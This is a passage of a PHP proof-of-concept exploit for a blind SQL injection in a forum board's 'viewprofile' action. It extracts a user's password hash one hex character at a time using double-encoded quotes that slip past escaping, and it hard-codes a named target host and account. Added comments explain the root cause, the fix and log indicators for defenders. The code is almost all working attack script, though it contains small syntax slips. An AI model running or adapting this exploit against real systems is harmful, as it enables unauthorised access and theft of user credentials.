so credit to str0ke and milkw0rm */

// Proof-of-concept for a boolean-based blind SQL injection through the
// `user` parameter of a board's "viewprofile" action. It recovers the
// `passwd` column one character at a time by appending an
// `AND mid(passwd, <position>, 1) = '<candidate>'` condition and observing
// whether the response contains the error text.
//
// Defender notes:
//  - Root cause, per the author's comment below: the value is URL-decoded a
//    second time after quote escaping has been applied, so `%2527` becomes
//    `%27` and then `'`. Escaping or validation must run on the fully decoded
//    value, and the query should use bound parameters instead of string
//    concatenation.
//  - Detection: one run produces a burst of near-identical viewprofile
//    requests from a single client, differing only in the position and the
//    candidate character; `%2527` and `mid(passwd,` in the query string are
//    distinctive log indicators.

// Target host, profile name and port are hard-coded by the author.
$server = "www.uberhacker.com ";
$user="Dozix007"
$port = 80;
$hash = "";                    // recovered characters are accumulated here
$hex = "0123456789abcdef";     // candidate alphabet: lowercase hex digits

// 32 positions of hex characters; consistent with a 32-character hex digest
// (presumably MD5, which the listing does not state).
for($i = 1; $i <= 32; $i++ ) {
    $idx = 0;
    $found = false;
    while( !($found) ) {
        $letter = substr($hex, $idx, 1);
        /* %2527 translates to %27, which gets past magic quotes. This is
           translated to ' by urldecode. In other words the payload is
           double-encoded: the quote only appears after the application's own
           second decode, which runs after the escaping step. */
        $url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
        $header = getHeader($server, $port, $url, "");
        // The oracle: a response WITHOUT the error text is taken to mean the
        // injected condition was true, i.e. the guessed character matches.
        if(!preg_match("/An Error Has Occurred/",$header) ) {
            echo $i . ": " . $letter . "\n";
            $found = true;
            $hash .= $letter;
        } else {
            $idx++;
        }
    }
}
echo "\n\nFinal Hash: $hash\n";

/**
 * Sends a bare HTTP/1.1 GET over a raw TCP socket and returns what was read.
 *
 * @param string $server Host name; resolved with gethostbyname() and also
 *                       sent in the Host header.
 * @param int    $port   TCP port to connect to.
 * @param string $file   Request target placed on the GET line as-is.
 * @param string $cookie Not referenced anywhere in the body.
 *
 * @return string The data read from the socket, or the literal "Unknown"
 *                when the connection could not be opened.
 */
function getHeader($server, $port, $file, $cookie) {
    $ip = gethostbyname($server);
    $fp = fsockopen($ip, $port);
    if (!$fp) {
        return "Unknown";
    } else {
        $com = "GET $file HTTP/1.1\r\n";
        $com .= "Host: $server:$port\r\n";
        $com .= "Connection: close\r\n";
        $com .= "\r\n";
        fputs($fp, $com);
        $header="";
        // Reads in 512-byte chunks until the accumulated data ends with a
        // blank line (\r\n\r\n at the very end of the buffer).
        do {
            $header.= fread($fp, 512);
        } while( !preg_match('/\r\n\r\n$/',$header) );
    }
    return $header;
}
?>